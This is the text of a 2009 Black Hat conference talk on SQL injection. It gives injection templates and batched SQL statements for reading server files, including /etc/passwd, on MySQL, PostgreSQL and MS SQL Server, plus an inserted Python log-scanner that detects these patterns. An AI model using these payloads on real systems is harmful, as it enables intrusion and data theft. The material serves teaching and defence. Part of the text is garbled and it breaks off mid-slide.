SQL injection
Bernardo Damele Assumpção Guimarães
Black Hat Briefings Europe Amsterdam (NL) – April 16, 2009
Who I am
Bernardo Damele Assumpção Guimarães:
• Proud father
• IT security engineer
• sqlmap lead developer
• MySQL UDF repository developer
SQL injection definition
• SQL injection attacks are a type of injection attack in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL statements
• It is a common threat in web applications that lack proper sanitization of user-supplied input used in SQL queries
SQL injection techniques
• Boolean-based blind SQL injection:
par=1 AND ORD(MID((SQL query), Nth char, 1)) > Bisection num--
• UNION query (inband) SQL injection:
par=1 UNION ALL SELECT query--
• Batched queries SQL injection:
par=1; SQL query;--
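As an added example (not part of the original slides), the following Python maps each of the three technique templates above to a regular expression and runs them over constructed web access-log lines; the hostnames, client IPs, parameter names and payload contents are assumed sample data.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# One pattern per technique shown on the slide. Batched queries are checked first,
# because a stacked payload (";") may also embed a UNION or a boolean fragment.
TECHNIQUES = [
    ("batched", re.compile(r";\s*(select|insert|update|delete|drop|create|alter|exec|copy|load|bulk)\b", re.I)),
    ("union", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("boolean", re.compile(r"\b(and|or)\s+ord\s*\(\s*mid\s*\(", re.I)),
]

def classify_value(value):
    """Return the technique label whose pattern matches a decoded parameter value, else None."""
    for label, pattern in TECHNIQUES:
        if pattern.search(value):
            return label
    return None

def parse_query(query):
    """Split a raw query string on '&' only and URL-decode each name and value."""
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        name, _, raw = part.partition("=")
        # Decode twice so a double-encoded payload is still inspected in plain form.
        pairs.append((unquote_plus(name), unquote_plus(unquote_plus(raw))))
    return pairs

def scan_request_line(line):
    """Return {param: technique} for every suspicious parameter in a common-log-format line."""
    m = re.search(r'"(?:GET|POST)\s+(\S+)\s+HTTP/', line)
    if not m:
        return {}
    hits = {}
    for name, value in parse_query(urlsplit(m.group(1)).query):
        label = classify_value(value)
        if label:
            hits[name] = label
    return hits

# Constructed sample log lines; the payloads follow the three templates on the slide.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Apr/2009:10:00:01 +0200] "GET /item.php?par=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [16/Apr/2009:10:00:02 +0200] "GET /item.php?par=1%20AND%20ORD(MID((SELECT%20user()),1,1))%3E64-- HTTP/1.1" 200 512',
    '10.0.0.9 - - [16/Apr/2009:10:00:03 +0200] "GET /item.php?par=1%20UNION%20ALL%20SELECT%20NULL,version()-- HTTP/1.1" 200 903',
    '10.0.0.9 - - [16/Apr/2009:10:00:04 +0200] "GET /item.php?par=1;%20CREATE%20TABLE%20footable(data%20longtext);-- HTTP/1.1" 500 0',
]
```

Signatures like these only catch the textbook shapes of each technique, so treat a hit as triage input; the root cause named on the definition slide, unsanitized input reaching the query, is what parameterized queries remove.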
How far can an attacker go by exploiting a SQL injection?
Scope of the analysis
• Three database management systems:
– MySQL on Windows
– PostgreSQL on Windows and Linux
– Microsoft SQL Server on Windows
• Three web application languages:
– ASP on Microsoft IIS, Windows
– ASP.NET on Microsoft IIS, Windows
– PHP on Apache and Microsoft IIS
Batched queries
• In SQL, batched queries are multiple SQL statements, separated by a semicolon, and passed to the database together
• Example: SELECT col FROM table1 WHERE id=1; DROP TABLE table2;
Batched queries support
Default support for batched queries in programming languages and their DBMS connectors
File system read access
File read access on MySQL
• LOAD_FILE() function can be used to read either a text or a binary file
• Session user must have these privileges:
– FILE
– CREATE TABLE for the support table
File read access on MySQL
Via batched queries SQL injection technique:
SELECT HEX(LOAD_FILE('C:/example.exe')) INTO DUMPFILE 'C:/WINDOWS/Temp/hexkflwl';
CREATE TABLE footable(data longtext);
LOAD DATA INFILE 'C:/WINDOWS/Temp/hexkflwl' INTO TABLE footable FIELDS TERMINATED BY 'MFsIgeUPsa' (data);
File read access on MySQL
Via any SQL injection enumeration technique:
• Retrieve the length of the support table's field value
• Dump the support table's field value in chunks of 1024 characters
On the attacker box:
• Assemble the chunks into a single string
• Decode it from hex and write it to a local file
File read access on PostgreSQL
• COPY statement can be used to read a text file
– A user-defined function can be used to read a binary file
• Session user must be a superuser to call this statement
File read access on PostgreSQL
Via batched queries SQL injection technique:
CREATE TABLE footable(data bytea);
COPY footable(data) FROM '/etc/passwd';
File read access on PostgreSQL
Via any SQL injection enumeration technique:
• Count the number of entries in the support table
• Dump the support table's field entries base64-encoded via the ENCODE() function
On the attacker box:
• Assemble the entries into a single string
• Decode it from base64 and write it to a local file
File read access on MS SQL Server
• BULK INSERT statement can be abused to read either a text or a binary file and save its content in a table's text field
• Session user must have these privileges:
– INSERT
– ADMINISTER BULK OPERATIONS
– CREATE TABLE
File read access on MS SQL Server
Via batched queries SQL injection technique:
CREATE TABLE footable(data text);
CREATE TABLE footablehex(id INT IDENTITY(1, 1) PRIMARY KEY, data VARCHAR(4096));
BULK INSERT footable FROM 'C:/example.exe' WITH (CODEPAGE='RAW', FIELDTERMINATOR='QLKvIDMIjD', ROWTERMINATOR='dqIgILsFoi');
File read access on MS SQL Server
[…] WHILE (@counter > filepath')
• Session user must have CONTROL SERVER privilege
• On the attacker box:
– Split the file in chunks of 64Kb
– Convert each chunk to its plain text debug script format
File write access on MS SQL...